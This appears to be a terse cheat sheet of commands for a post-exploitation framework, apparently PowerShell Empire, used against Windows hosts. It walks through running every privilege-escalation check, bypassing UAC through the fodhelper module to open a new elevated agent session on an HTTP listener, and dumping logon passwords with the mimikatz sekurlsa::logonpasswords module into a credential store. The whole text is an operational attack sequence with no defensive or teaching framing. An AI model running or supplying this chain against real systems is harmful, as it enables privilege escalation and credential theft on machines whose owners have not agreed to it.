• usemodule powershell/privesc/powerup/allchecks to check all privesc exploits
  • execute
  • suppose it show uacbypass then usemodule privesc/bypassuac_fodhelper info set Listener http execute new session will be created interact <agents-id>
  • usemodule credentials/ to check cred modules usemodule credentials/mimikatz/logonpasswords execute sekurlsa::logonpasswords
  • this cred will be saved in creds . move to active session creds